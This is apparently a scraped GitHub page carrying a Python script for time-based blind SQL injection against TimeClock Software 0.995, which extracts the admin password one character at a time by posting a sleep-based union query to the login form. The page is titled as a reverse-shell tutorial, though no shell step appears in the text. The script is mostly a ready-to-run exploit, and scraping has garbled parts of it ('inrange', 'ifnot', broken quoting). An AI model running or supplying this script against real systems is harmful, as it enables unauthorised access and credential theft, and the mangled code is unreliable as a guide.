Anatomy of an attack: Gaining Reverse Shell from SQL injection. Posted in Hacking on March 28, 2018.
Permalink
Join GitHub today
GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.
Sign up Find file Copy path
1 contributor
#!/usr/bin/env python |
# |
# Time-based blind SQL injection for TimeClock Sofware |
# Based on TimeClock Software 0.995 - Multiple SQL Injections |
# https://www.exploit-db.com/exploits/39404/ |
# |
# Usage: timeclock.py <Host> <Port> |
# |
import requests, string, sys |
query ='' union SELECT * from user_info WHERE username = 'admin' and substr(password, %d, 1) = binary '%s' and sleep(2) -- ' |
chars = string.ascii_letters +'0123456789' |
host = sys.argv[1] |
port = sys.argv[2] |
print('Running!') |
for i inrange(1, 100): |
found =False |
for c in chars: |
try: |
requests.post('http://'+ host +':'+ port +'/index.php',data={'username': query % (i, c), 'password': 'pass', 'submit': 'Log In'}, timeout=1) |
except requests.exceptions.Timeout: |
sys.stdout.write(c) |
sys.stdout.flush() |
found =True |
break |
ifnot found: |
break |
print('nDone! Try Harder!') |
Copy lines Copy permalink